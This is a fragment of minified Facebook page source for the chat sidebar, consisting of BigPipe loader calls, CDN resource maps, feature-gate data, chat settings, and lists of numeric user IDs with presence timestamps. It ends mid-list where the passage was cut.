require("TimeSlice").guard((function(){bigPipe.onPageletArrive({allResources:["Bee0v","sQ7ef","MbCGD","jAeyQ","IO8eo","NmVPR","dIFKP","Adbbx","C/4sM","rzQjB","zpNP2","Xxho8","q+9No","5p2rH","ldHu6","np5Vl","rdSEf","L4sg3","onpAC","87rxF","7aYsk","hv63h","j4Op8","BEw9R","XZrv9","/NvwD","NHGTD","P5aPI","kHLQg","j4Ljx","utT+H","72OwO","0n0v6","27fPb","D0Bd3","IEK7S","Pfi8i","vjHYq","uSKfe","P/mr5"],displayResources:["Bee0v","sQ7ef","MbCGD","jAeyQ","IO8eo","NmVPR","dIFKP","C/4sM","rzQjB","zpNP2","Xxho8","q+9No","5p2rH","ldHu6","np5Vl","rdSEf","7aYsk","j4Op8","/NvwD","NHGTD","kHLQg","j4Ljx","utT+H","72OwO","0n0v6","27fPb","D0Bd3","IEK7S","Pfi8i","P/mr5"],id:"first_response",phase:0,last_in_phase:true,tti_phase:0,all_phases:[63,62]});}),"onPageletArrive first_response",{"root":true,"pagelet":"first_response"})(); </script> <script> bigPipe.setPageID("6568014334500785022-0");CavalryLogger.setPageID("6568014334500785022-0"); </script> <div class="hidden_elem"> </div> <script> bigPipe.beforePageletArrive("pagelet_sidebar") </script> <script> require("TimeSlice").guard((function(){bigPipe.onPageletArrive({bootloadable:{"ChatTypeaheadWrapper.react":{resources:["NHGTD","LCmDO","BEw9R","NmVPR","0O7A6","eqNxI","ASgw6","vjHYq","+FAAM","P5aPI","np5Vl","/NvwD","AMXo2","kHLQg","0k9b3","Bee0v","rdSEf","8Q9tZ","AfZgB","0n0v6","rXUOD","hrkyQ","IO8eo","rzQjB","zpNP2","q+9No","2dbAx","0Klmq","onpAC","AYvAm","MbCGD","Xp5SU","IEK7S","wLka7","sQ7ef"],needsAsync:1,module:1},"ChatSidebarSheet.react":{resources:["BEw9R","+FAAM","0k9b3","Bee0v","IO8eo","rzQjB","zpNP2","q+9No","0Klmq","MbCGD","Xp5SU","sQ7ef"],needsAsync:1,module:1},ChatImpressionLogger:{resources:["E0mtB","BEw9R","Bee0v","IO8eo","zpNP2","q+9No","Eem/r"],needsAsync:1,module:1},ChatReliabilityInstrumentation:{resources:["BEw9R","IO8eo"],needsAsync:1,module:1},KeyboardShortcuts:{resources:["BEw9R","np5Vl","/NvwD","Bee0v","rdSEf","IO8eo","zpNP2","q+9No","MbCGD","sQ7ef"],needsAsync:1,module:1},UIPagelet:{resources:["np5Vl","Bee0v","IO8eo"],needsAsync:1,module:1},MercuryJewelBootloadModules:{resources:["Bee0v","IO8eo","hv63h"],needsAsync:1,module:1},MessengerWebGraphQLTypedLogger:{resources:["IO8eo"],needsAsync:1,module:1},MessengerWebGraphQLEvent:{resources:["IO8eo"],needsAsync:1,module:1},MessengerContentSearchFunnelLogger:{resources:["Bee0v","IO8eo","onpAC","Av0f1"],needsAsync:1,module:1},MessengerContentSearchFunnelLoggerConstants:{resources:["Av0f1"],needsAsync:1,module:1},"MessengerGraphQLThreadFetcher.bs":{resources:["/0QuQ","BEw9R","Bee0v","IO8eo","rzQjB","q+9No"],needsAsync:1,module:1},"MessengerMessageDFFFetcher.bs":{resources:["Bee0v","IO8eo","rzQjB","q+9No","eGgg2"],needsAsync:1,module:1},"MessengerThreadDFFFetcher.bs":{resources:["BEw9R","2Rn3p","Bee0v","IO8eo","rzQjB","q+9No"],needsAsync:1,module:1},ChatPinnedThreadsTypedLogger:{resources:["vgmzo","IO8eo"],needsAsync:1,module:1},ChatPinnedThreadsEvent:{resources:["vgmzo"],needsAsync:1,module:1},ChannelConnection:{resources:["BEw9R","Bee0v","IO8eo","rzQjB","zpNP2","0Klmq"],needsAsync:1,module:1},ChannelManager:{resources:["BEw9R","Bee0v","IO8eo","rzQjB","zpNP2"],needsAsync:1,module:1},ChannelTransport:{resources:["IO8eo","rzQjB","zpNP2"],needsAsync:1,module:1},"Tooltip.react":{resources:["Bee0v","IO8eo"],needsAsync:1,module:1},"WaveButton.react":{resources:["Tqhth","AfZgB","IO8eo","QpVM2","sQ7ef"],needsAsync:1,module:1},"ChatSidebarPymmListContainer.react":{resources:["/Ql0t","NHGTD","tdTjH","BEw9R","NmVPR","f5XFz","AMXo2","kHLQg","Bee0v","IW7Ty","AfZgB","dIFKP","27fPb","Mkf9Q","IO8eo","rzQjB","zpNP2","q+9No","Pfi8i","MbCGD","sQ7ef"],needsAsync:1,module:1},MessengerChatSidebarSlotsTypedLogger:{resources:["IO8eo","KKFSn"],needsAsync:1,module:1},WorkChatAvailabilityStatusActions:{resources:["Bee0v","IO8eo","8D3VM"],needsAsync:1,module:1},WorkChatAvailabilityStatusStore:{resources:["BEw9R","Bee0v","dIFKP","IO8eo","rzQjB","zpNP2","q+9No","8D3VM"],needsAsync:1,module:1},"ChatSidebarItemUserPlayingGameInfoContainer.react":{resources:["yA1hm","iLoE/","n3CYQ","NHGTD","DPlsB","BEw9R","NU36+","NmVPR","6PS40","saB+d","ASgw6","+FAAM","P5aPI","/NvwD","AMXo2","oHpkH","kHLQg","0k9b3","Bee0v","Tqhth","AfZgB","rXUOD","dIFKP","0iDOQ","IO8eo","m2um9","C/4sM","rzQjB","zpNP2","q+9No","+pd15","5p2rH","onpAC","hv63h","y0eEc","AYvAm","pa5gO","MbCGD","jAeyQ","Xp5SU","2VNOd","87rxF","sQ7ef"],needsAsync:1,module:1},ChatSidebarHoverCardV2:{resources:["4gUIF","BEw9R","1vdgS","/NvwD","Bee0v","A3pIY","IO8eo","zpNP2","sQ7ef"],needsAsync:1,module:1},"GamesPresenceIconContainer.react":{resources:["yA1hm","iLoE/","n3CYQ","NHGTD","DPlsB","BEw9R","NU36+","NmVPR","6PS40","saB+d","ASgw6","+FAAM","P5aPI","/NvwD","AMXo2","oHpkH","kHLQg","0k9b3","Bee0v","Tqhth","AfZgB","rXUOD","dIFKP","0iDOQ","IO8eo","m2um9","C/4sM","rzQjB","zpNP2","q+9No","+pd15","5p2rH","onpAC","hv63h","y0eEc","AYvAm","pa5gO","MbCGD","jAeyQ","Xp5SU","2VNOd","87rxF","sQ7ef"],needsAsync:1,module:1},"ChatSidebarWorkWelcomeOverlay.react":{resources:["BEw9R","Bee0v","AfZgB","IO8eo","JwBiS","sQ7ef"],needsAsync:1,module:1}},resource_map:{LCmDO:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3i6Wg4/yx/l/en_GB/U58IwgJIq84.js",crossOrigin:1},"0O7A6":{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3iEI74/ya/l/en_GB/HJVdXBrgScb.js",crossOrigin:1},"8Q9tZ":{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3iWD04/y6/l/en_GB/hDQ_k8ekbFb.js",crossOrigin:1},rXUOD:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3iBY14/y5/l/en_GB/ifdzwNThybp.js",crossOrigin:1},hrkyQ:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3iFz-4/yS/l/en_GB/hRdOXz_Dy8F.js",crossOrigin:1},wLka7:{type:"css",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/0,cross/vWlQkVBoMdv.css",permanent:1,crossOrigin:1},E0mtB:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3iXN04/yP/l/en_GB/2Uw7addDqK4.js",crossOrigin:1},"Eem/r":{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yx/r/MonScOf6pbA.js",crossOrigin:1},"/0QuQ":{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yj/r/WZuQVDBbO-T.js",crossOrigin:1},eGgg2:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yB/r/geZppe8rkvu.js",crossOrigin:1},"2Rn3p":{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yq/r/RSNXhubmVLA.js",crossOrigin:1},vgmzo:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yN/r/Jkqf3OgkrVo.js",crossOrigin:1},Tqhth:{type:"css",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yh/l/0,cross/zsPeus18ftY.css",crossOrigin:1},QpVM2:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yI/r/3Mr7Nn25oHK.js",crossOrigin:1},"/Ql0t":{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yk/r/VAQat-EzIP2.js",crossOrigin:1},tdTjH:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/y4/r/ZtzYr1vkMT_.js",crossOrigin:1},f5XFz:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3ilNU4/yd/l/en_GB/rCSjx-dMoLm.js",crossOrigin:1},IW7Ty:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3i5lF4/yb/l/en_GB/s5bDU37HgiS.js",crossOrigin:1},Mkf9Q:{type:"css",src:"https://static.xx.fbcdn.net/rsrc.php/v3/y7/l/0,cross/r0ZsmxX2-z_.css",permanent:1,crossOrigin:1},"8D3VM":{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/y8/r/8XEu65jTUY2.js",crossOrigin:1},yA1hm:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3iEoE4/ya/l/en_GB/SzWSvC59IsA.js",crossOrigin:1},"0iDOQ":{type:"css",src:"https://static.xx.fbcdn.net/rsrc.php/v3/y8/l/0,cross/7771eQlthcu.css",permanent:1,crossOrigin:1},m2um9:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3iWhJ4/yY/l/en_GB/QpR91sctfQx.js",crossOrigin:1},y0eEc:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3ifP14/y0/l/en_GB/6XsldJDqPrd.js",crossOrigin:1},pa5gO:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3iqMm4/yg/l/en_GB/iUM9PjaBY7L.js",crossOrigin:1},"2VNOd":{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3iQrV4/ya/l/en_GB/LYUIhk5gmZj.js",crossOrigin:1},"4gUIF":{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3/yM/r/QrfEYvThDnK.js",crossOrigin:1},JwBiS:{type:"js",src:"https://static.xx.fbcdn.net/rsrc.php/v3iwJs4/yl/l/en_GB/pSK-Jda3t4m.js",crossOrigin:1}},ixData:{"28076":{sprited:true,spriteCssClass:"sx_91550d",spriteMapCssClass:"sp_yadyws_ErYN"},"74517":{sprited:true,spriteCssClass:"sx_9911d1",spriteMapCssClass:"sp_yadyws_ErYN"},"118297":{sprited:true,spriteCssClass:"sx_db0e9b",spriteMapCssClass:"sp_yadyws_ErYN"},"129548":{sprited:true,spriteCssClass:"sx_d32503",spriteMapCssClass:"sp_yadyws_ErYN"},"286109":{sprited:true,spriteCssClass:"sx_db8bcd",spriteMapCssClass:"sp_yadyws_ErYN"},"492281":{sprited:true,spriteCssClass:"sx_5416f8",spriteMapCssClass:"sp_yadyws_ErYN"},"86853":{sprited:true,spriteCssClass:"sx_aaf988",spriteMapCssClass:"sp_-ldAr6eGODF"},"86854":{sprited:true,spriteCssClass:"sx_d1e237",spriteMapCssClass:"sp_-ldAr6eGODF"},"86857":{sprited:true,spriteCssClass:"sx_738891",spriteMapCssClass:"sp_-ldAr6eGODF"},"86924":{sprited:true,spriteCssClass:"sx_359035",spriteMapCssClass:"sp_-ldAr6eGODF"},"86933":{sprited:true,spriteCssClass:"sx_ce1c6d",spriteMapCssClass:"sp_-ldAr6eGODF"},"359731":{sprited:true,spriteCssClass:"sx_762442",spriteMapCssClass:"sp_mRr2n9ltJEF"},"359732":{sprited:true,spriteCssClass:"sx_dea3fb",spriteMapCssClass:"sp_mRr2n9ltJEF"},"86852":{sprited:true,spriteCssClass:"sx_aff203",spriteMapCssClass:"sp_-ldAr6eGODF"},"141787":{sprited:true,spriteCssClass:"sx_217a14",spriteMapCssClass:"sp_-ldAr6eGODF"},"418439":{sprited:true,spriteCssClass:"sx_73a643",spriteMapCssClass:"sp_mRr2n9ltJEF"},"507177":{sprited:true,spriteCssClass:"sx_32a856",spriteMapCssClass:"sp_mRr2n9ltJEF"},"579343":{sprited:true,spriteCssClass:"sx_e028bf",spriteMapCssClass:"sp_mRr2n9ltJEF"}},gkxData:{"AT6Vd8Lbi8UqLKJqQjAcfopWe5cqEOccp4eiS-V8yRxIDMKBLX2DogknGNtScECqpDmo8hLH8oHxnmHNnFmaPT0QTS-6M2LFaLgAiPg3H1wdHg":{result:true,hash:"AT4F--uggpHbNQ3g"},"AT7b-T545bsAAbOyiRE0i8vzwAqg-R4NRaZ4WCkL5TZUAjQ3ntria2ZiM69962yv5cnbq6KuBYvaMYzUdYYVWB-O":{result:false,hash:"AT663vxqlNrL8vve"},"AT5TWxfoyJTuU3Tr-O8sY_Gkxvimm2rPLn9ZsAsusyJiAYq-zLKg2_7_eMccMJTI9qOx7gwISC6rrsGtqpWk_uDLins6TCNHhi73ZUmc4ebtyg":{result:true,hash:"AT69GugJsSoBdU88"},"AT65aWKrtJj5OrvMCdm_OgNblUKceQOyajsYMcV9YtzUj3ZHj_aVLY1fm-j6_0V9tLsLzk2inEWuRR4F6LAYYSAr":{result:true,hash:"AT6Q_Gbq2VeOjXB_"},"AT4gz_bRY5sNyXC9w4Akayj0OxvthyCO40TL1o3mvHk46uC52cZoFYJtJRK1uwlf9JMyhc21L_1vGUfFxZI19a9hOgbL7cH2dTTH2gcs-MFRwA":{result:false,hash:"AT4dZ7ug6cpRJpqs"},"AT6ezxCFIuDr3f155YU0cVompttkL6-4ye5A4xnJR5wWiQ5IOmLV0d94XM9VgwajF9248OtJTIz0cnvOn5PCMW2_":{result:true,hash:"AT5fYHYG8SfCYfd_"},"AT4xuZ6KicTRHJ7-VVo2al5OuIgAH2UnbvppZwmWOFgaXXw1Df_vJXJR_TJQJ8YKN1RjtB4EWptwOe1mw8W6tT1FjYsXDZ_wxr3ljwpzw17dng":{result:false,hash:"AT4_OCASHK0kjpJX"},"AT5IvuE7ZC3UHqOIrperWBqnPRJB-4i3O1lK6UHKCeB2Qv_h-q8tQBe-hbIcjbrwQQAUFvheEGQ08bmOBzC0UNM8sHBTeZ77GLtxYXgmBgZI0g":{result:false,hash:"AT6J0QlNkW0sXab9"},"AT6ZCntuwGBL1LBDjniJnuZTki0EgqKZ16N0_aKYu1tUnleN5fWyObM-HMcM9_e2aftsyQ6i7hVPvvzxMu5Zazav":{result:true,hash:"AT4nfmNl2yubUpQr"},AT6u73YzhSbtwfTvGI_dUkCDWV1VMa7c035xhh1qNzWWNDuWfna3ikNNGOjtL2adauohv1GFlwZ9RrqzMEpZG7gY:{result:true,hash:"AT5zmmUgMrBAWNr-"},AT6xZmI2OdSYphpl234QKktFXq5sRz0kw7_B2KSTTJG4l__HXq2R95tfCOGk3WHJAmEbSfznHtUDjqZLC1cYF7k9:{result:true,hash:"AT5rdGtyf0ldATxT"},AT6dSUFvqaQ48TePPsqJaPxoR89sKDrmnkj9AwTUQGCUAO64e0__lqQVl0pZO8oX1VVITdmuH2Oh5NO1Ry2djFb0:{result:true,hash:"AT4urr1w8O3qYjSl"},AT4T9LO8V3BIOVcGOYPKxxsCiNDzy0HHXFfwezwsUTXaZjtufQoUfjAr_b0uxP3zESohJEtycMUpu9xvYr512cum:{result:false,hash:"AT672QpW6e6Y2Min"},AT5N7c3vp2KZeBLcdLGCkrCGhNAJHtjW4P7Xmlq4tK83K879cfHJ4CNLjdjOGJAQApRspNV8z5qOFgj3xZqsPbN0:{result:true,hash:"AT6u4vR0j92cqwlR"},AT5XEYH1ZrReYerzhKj5_PytaAcJxBVvUm8BnU1UXvJkWL3CRwm9HpjP4d4QdvCcJzEps4hn0e9aiGI9CC7UmRMvSwDP5zZ1DHe3XtDkTFXDIg:{result:true,hash:"AT68KF94KaJUa-hf"},AT4Aq9ewKIFTl67cxoDAodIE6NOyKQZWxOTK7vUN4WSVpVwOKKYWwQCOkB7MMU0feig4qnlFrIZeyqu4hV61bOjlQn8Q2DP89kXsLrKS2wNNWQ:{result:true,hash:"AT4EDswGsuknD-L0"},"AT6TwEfyE3S3vuj5vzRrcHEi-HcoHeZ6vee22bU63x8bdHsLirNM3h1OMH1kyUhz92T9lqrOtqys1ni5dEuGQ43h":{result:true,hash:"AT6bfVw43rzWLjop"},"AT7HdSIkhS9TSQx6PWXopj-NxmSus9nuXkEu6XM1WdZJElXpLdnQNN92q5iZdzYJyRUbbjoWOgsBC8RH9ivzcfSt":{result:false,hash:"AT7CA_wZnrQoYR8E"},"AT78v4PambQ_cdAE80SQ2u-PEF080LOtbyF0clYPG1BZ0oKWtBk3yYmPrq0iSUUgoNhwXsFBRIZTASSteonhNi4R":{result:false,hash:"AT6R_1VCuGpOJyF3"},"AT7OsZ9HtEyPgfhJFQHuE0P041fHeeN2NPSm1EqAg463b6aopCITyZWjbp4OgKkQKtYXSpA-M6CmnBX7-J8cZgbvURt5zoQ3MC2POa0dZoQCkA":{result:false,hash:"AT5NhmbOE4wlaPDo"},"AT62Bmuf0c-b-qsSo41XTNJvFn7VwRrjwsI0onsrzyJ35XDxvhLHgPbXt3hZorqUAYplG7jtkngT9YqyGngqDfMq":{result:false,hash:"AT5yO7jWJEldq8jl"},"AT7omQGbzbKjs-IJTeKHodsJ4XCqhdzRXtP-wJ2KzH41x6wSCe6KBrvkgJohXaMroOQl1AnR9dv4h45WCYYhCxfYfsAVw3oY4bjP1vUBZwskkQ":{result:false,hash:"AT7hMM0r_SavbMvq"},"AT4I1AK1uv1_8XMb1kbzNqTA0P1-tohzerR4R7W_VXtAcPmhbGk8Y-IwnNajcrCT21UUJtsPPphI0YWIVSZ2CJMi1DZeWJ5xWwIWGBrq7pGH7w":{result:false,hash:"AT6n55IWkRB6CGm0"},AT40OYqleZgx4_fLMr8MfXL_p194P9S4sUc6KbJKgvwElmT2Aj8TCRUAE4QBlOnOrqktka6w0qRv70XxEE3mR93T57P4MxmwmjYSU_ecGje_hg:{result:true,hash:"AT4dF5oNgcWKcVpF"},"AT7fEWlWLwzcomQ12uRE_cG5HZJE7FbXXRCfPurxhw8vIpN6D0E7mGAi-hDkDV8fg1mjxj-jQMaCESDTVOkEzzqV":{result:false,hash:"AT5ZbBUw2nltprsL"},"AT5GhC4rylRpYKpnZf2oEtsedOSc0WCJLB5V8z6-mqCNieSKORSJnqenUlgYVRpQaRNASrJq2SeIYY3m4QNhPBlK":{result:true,hash:"AT7leJw8brL6t81N"},"AT5xrCi08i7kM3hip_Bf4sUgmdKPV1QphRx_J6kDVSso_LwnuXnsPyhq98JRQV_MqHjleZ_pelk8UHK4mDklEDU4gdH-DgPi3glxyQ2_7CHTgw":{result:true,hash:"AT4r1uqnIVTTqWI2"},"AT6Yilkln5f96nRXioOq13cDPCObGBXyvgYqCAnQUaX65pRAKq-nGqLOprquxXuHzv81m5wzzj4tuAiPBqV-ffQ_qlTKHg2SAFcZxWCm3nT90A":{result:false,hash:"AT5evSkfVwwhfm1x"},"AT5cMzCIw97Q3PRYKBvBtn-VnDYYcA-Y6zMPk_zHjJZw-HUpTzPcPVGCLyIdPHAWmeU1pzwt_-KZc6CgbyvSCzN--cn858rR8aTWcaJyuEn84g":{result:true,hash:"AT4bH2_9zeB-dLvo"},"AT7Nl3tLEJO2IjRkhJ4X633dErAXWCBPweNzdGYYETkEoZsqSwC1ospyTu6N-XFvjMzpRazua6iYeD8_mPWTX2koS_tAd1W3R31fvbk3gyWu0w":{result:false,hash:"AT6Dg_NrtwV6H6gh"},"AT7BqruCTmoDZowXYVO6ImCVrsT20ejA8XxEoxe8FSWRe61kbNOHDiaVFe4NQowm6H7Beb0Zh2-wxfrmnxlmdT31OF2rsT32nD9d-imL6ICCYw":{result:true,hash:"AT71gjuaviK4HS2X"},"AT5YfcRUM2x2B7u9m1cTLTRmQWwdzauSboi1njUpVAZC4-M6_j4cS53wESTAXtCWjnzl4UYYVjytl_MrPc6jLqq_":{result:false,hash:"AT64cFUATSQipyO8"},"AT5sb0TZdwYCmmcqkHoVydPcWtCP7dcmXHd8rGMrJmXGbAowbSY6WNbFtGhc0KTaHgl2_dTLDlyqjQ7eT45pCrCv10XsKXRfFMLClbD6TJu1-w":{result:true,hash:"AT5wE39sG5G2qnn5"},AT5BQVeCXqjGowaaBN4YzIi8sMXMSQIvMDY7dHssNl85ZAiWvdhfoTomZZ3nimjvBlAG_D1zrk3Mv_R4kZiu34LgbOpnBdqHw7cUmtV3GK52JQ:{result:true,hash:"AT5gnLrJ-q4DmPNY"},"AT4a6CDMmETqv3s7MWbwev319q-zUQKcXrtdkeEYJdlekWRyNf6_F2gGMigIJHTIYFo8n0r2Fv4udl52bfM4WXNu":{result:false,hash:"AT70AumSG3i9_aez"}},allResources:["Bee0v","IO8eo","MbCGD","AfZgB","BEw9R","kHLQg","zpNP2","/NvwD","rzQjB","q+9No","2dbAx","AYvAm","sQ7ef","jAeyQ","rdSEf"],displayResources:["Bee0v","IO8eo","AfZgB","BEw9R","kHLQg","zpNP2","AYvAm","sQ7ef","jAeyQ"],jsmods:{instances:[["__inst_012ab79b_0_0",["ChatOrderedList","__elem_012ab79b_0_0"],[true,{__m:"__elem_012ab79b_0_0"},null,false],2],["__inst_6d41db38_0_0",["ScrollableArea","__elem_6d41db38_0_0"],[{__m:"__elem_6d41db38_0_0"},{persistent:true,shadow:false}],1]],elements:[["__elem_dbfd3947_0_0","u_0_y",1],["__elem_6d41db38_0_0","u_0_z",1],["__elem_a588f507_0_b","u_0_10",1],["__elem_012ab79b_0_0","u_0_11",1],["__elem_a588f507_0_a","u_0_12",1]],require:[["ChatTypeaheadCore","init",["__elem_a588f507_0_a"],[{__m:"__elem_a588f507_0_a"},"100022900869586",true]],["ChatSidebar","init",["__elem_dbfd3947_0_0","__inst_012ab79b_0_0"],[{__m:"__elem_dbfd3947_0_0"},{__m:"__inst_012ab79b_0_0"}]],["ChatUnreadCount","getForFBID",[],["100022900869586"]],["__inst_6d41db38_0_0"],["ScrollBoundaryContain","applyToElem",["__elem_a588f507_0_b"],[{__m:"__elem_a588f507_0_b"}]],["__inst_012ab79b_0_0"]],define:[["AvailableListInitialData",[],{activeList:[100015358598632,100018930885425],lastActiveTimes:{"100001983112325":1529234145,"100007444623061":1529228549,"100004191843068":1529226321,"100015358598632":1529235005,"100006907545849":1529234418,"100015161917328":1529145530,"100005216520628":1529199584,"100018930885425":1529235005,"100011738303596":1529234704,"100014728878329":1529108990,"100013903003981":1529217832,"100013919472998":1529233891,"100018230501540":1529119159,"100004407343789":1529233201},chatNotif:0,playingNow:[]},166],["ChatConfigInitialData",[],{sidebar_ticker:true,chat_basic_input:false,divebar_rounded_profile:true,chattab_rounded_profile:true,www_secret_mode:false,chat_tab_custom_color:true,nearby_friends_www_chatbar:true,presence_page_green_dot_sub:true,messenger_only_divebar:false,presence_throw_for_malformed_id:false,min_top_friends:15,seen_forwarding_nux:0,seen_cam_button_nux:0,chat_basic_input_module:null,message_jewel_promotion_data:null,chat_impression_logging_with_click:true,chat_impression_logging_periodical:true,"sidebar.minimum_width":1258,"periodical_impression_logging_config.interval":1800000,typing_notifications:true,"sidebar.min_friends":"0",tab_max_load_age:86400000,tab_auto_close_timeout:86400000,"sound.notif_ogg_url":"https://static.xx.fbcdn.net/rsrc.php/yR/r/lvSDckxyoU5.ogg","sound.notif_mp3_url":"https://static.xx.fbcdn.net/rsrc.php/yB/r/AbBUo4Db-9q.mp3",has_apps_option:false,show_admined_pages:false,show_businesses:true,show_header:true,work_show_invites:false,active_cutoff:120,chat_tab_edit_nickname:true,chat_content_search:true,unread_count_fix:false,num_groups_to_show:3,viewer_presence_capabilities:null,expanded_divebar_width:206,presence_on_profile:false,single_line_composer:false,emoji_first:false},12],["ChatOptionsInitialData",[],{sound:1,sidebar_mode:1,browser_notif:0,hide_admined_pages:0,hide_businesses:0,hide_groups:0,call_blocked_until:0,hide_buddylist:0},13],["InitialServerTime",[],{serverTime:1529235005000},204],["PresenceInitialData",[],{cookiePollInterval:500,cookieVersion:3,serverTime:"1529235005000",shouldSuppress:false,useWebStorage:false},57],["PresencePrivacyInitialData",[],{onlinePolicy:1,privacyData:\{},visibility:1},58],["WorkModeConfig",[],{is_worksite:false,is_work_user:false,test_group_section_order:false,has_work_user:false},396],["ChatSidebarBotsDispatcher",[],{module:null},2922],["ChatSidebarBotsStore",[],{module:null},2923],["ChatSidebarCachedViewport",[],{viewport:null},3191],["WWWSiteOrganizationGating",[],{largerBlueBar:false,largerJewels:false},3267],["SidebarAppsInitialVisibility",[],{visible:false},3356],["SidebarWorkTopGroupsVisibility",[],{visible:false,numGroups:0},3384],["MessengerURIConstants",[],{ARCHIVED_PATH:"/archived",COMPOSE_SUBPATH:"/new",GROUPS_PATH:"/groups",PAYMENT_PATH:"/p",PAYMENT_PAY_PATH:"/pay",PEOPLE_PATH:"/people",SUPPORT_PATH:"/support",FILTERED_REQUESTS_PATH:"/filtered",MESSAGE_REQUESTS_PATH:"/requests",THREAD_PREFIX:"/t/",GROUP_PREFIX:"group-",FACEBOOK_PREFIX:"/messages"},1912],["WWWBase",[],{uri:"https://www.facebook.com/"},318],["EmojiConfig",[],{pixelRatio:"1",schemaAuth:"https://static.xx.fbcdn.net/images/emoji.php/v9",hasEmojiPickerSearch:false},1421],["ErrorMessageConsoleDEVOnly",[],{module:null},3112],["InitialChatFriendsList",[],{adminedPages:[],pageListModule:null,pymmList:{pages:[{category:"Sport & recreation",id:612839742410091,imgSize:50,imgSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/p200x200/33577131_612854662408599_741219902550966272_n.jpg?_nc_cat=0&oh=a7826eb83d772011338b519c3dd17d3d&oe=5BB613D3",name:"Empire Power Gym",ref:"www_chatbar",uri:"https://www.facebook.com/empirepowergym/",egoLogData:"AT65JocgSgOIkZAarqyu1ZZlqHEvsRF1CMEFmuYj805mkM8jhrr-PR-FHi8xk8i0g90fllSTkr1r7bNLJeXFAVAa_klkyX5JJzgq6CYgrKXuykKLbBY697-1hNFPlh6nFqQ_drZ4NIJRKKE_wu3ieORDWff9tNTG4B3KC6Y62MvO05oXnOmw0PVPp8lWbAtQgcqrNHvw3dxr4HeoNB-2tDWSKlze6bzu8ODHkFoAP7cYROQPeBb_Upgr-jFN-f5mF6wjm816gz6bPWf7_28ggucbxi1a6F-_F6fRL3hFnUtK3vtggSWQZ7V3pzQQRy5pglEYxNArFZD7yw8aX5lNYR-WuzZka63S0g8hRy6BeyvxwIn4rdArCFctY6WoXK6A22UJaEJGnrWwnxLC38b5G-xc_rKaYDetVThu40DSxap9WwNYlYtY7jlc8u5etrO8d4J3UpbP38WXEKuZicdWkHjrajkNTSjvtdsrlJKoUUITItR2McHNXocd1K4xMINgoj2k4oqPqWDPcvKTvE1kcQgtQsdL9GxOLkYzuBvFNJojaeMa"},{category:"News and media website",id:425515000929011,imgSize:50,imgSrc:"https://scontent.fisu6-1.fna.fbcdn.net/v/t1.0-1/c1.0.200.200/p200x200/33615818_1087360214744483_3894842005196374016_n.jpg?_nc_cat=0&oh=f11f64b704478b61049ba3cbe5a1fdd2&oe=5BC2C579",name:"Infowars oz",ref:"www_chatbar",uri:"https://www.facebook.com/infowarsoz/",egoLogData:"AT40cj91fWqoNyIQVb9OXnQQVKCZtO5q1ZCEsn-3-ILKv6QA1RJpP2vVcKAqHuDQyGFgttT1vceH4L3OBglRAU_eXiVl-S51n5Wg-pk8W5GXvtLEKXmBEjtd5CUAp5Z6DC_-b33Uea-NTZxAIfD2t8AfSFF2dQ825ezzjBVmYF538uQPkfoGHHP2RKGKnmTEA_obhdBFIbAUfTQy5mYXIqqiL2nMFzIUhJB8xI-zmqvQPLD7TDjT66XqUgOZLVat-PvyEzwVHGshkxHq2SXMfDmf53RCDInjP9gY8b7BXd484BCNQ0Yz2QAqa3nx1pOILxmRLM1guF9XS7t_m0QRkpSTzusCthT_5FUyUCh9FOXyCT-7rIab1Q7S-eAlQVVo9PjqT_HZHaqd7CGSVvFpt1HDHttckvgIw3Al8yGuX5TqMyck3Y5zfE5TheQ4gtUKLNPwvtzjB-SQ3h5rRp6VjiiqOXgpb5xFEgSchs236A51GKfctlSsE0g6NoZ3pCozhMNyWORtP45yPhG5gDCIl7cHX9fWJUeoKcEocV7h218P-UKK"}]},groups:[{uid:"1796796520330890",mercury_thread:{participants:["519047872","530524233","532404907","535232813","545995783","632135234","662855806","678777054","704455254","731440036","735648308","769855544","773094262","797478676","860175180","902185365","1012461864","1163390666","1178080324","1185625052","1215375144","1325787437","1379199385","1379446816","1432627657","1483292331","1491365610","1521014185","1535648912","1571813518","1667508217","1685681869","1735387763","1740823546","1818348102","1830376502","100000054845502","100000080663070","100000090405296","100000110527579","100000250420311","100000345246327","100000363106543","100000428351834","100000503733322","100000525675833","100000597976287","100000653901809","100000702769689","100000733494986","100000872363748","100001012203439","100001273871618","100001278303652","100001354799198","100001428324815","100001507194999","100001594016379","100001669141102","100001774614423","100001842184539","100001849124035","100001993184506","100002368555824","100002379326010","100002473742309","100002475519036","100002563948836","100002605578171","100002747397440","100002827583231","100002877417296","100003020722891","100003045406446","100003266790697","100003306451213","100003364671724","100003477650128","100003565747661","100004166592174","100004173450287","100004240954488","100004324871314","100004331589106","100004355112504","100004385498984","100004582993613","100004662912459","100004810995757","100005507857316","100005673251316","100005691339424","100006605263704","100006679416368","100006733332097","100006745895868","100006783164866","100006868053794","100006911168219","100007225302493","100007354267498","100007367580866","100007423022947","100007602609338","100007866785589","100007894478119","100008044833745","100008084264656","100008120581536","100008243537611","100008566003760","100008818481830","100008962694905","100009167512719","100009188856020","100009201431045","1000092241145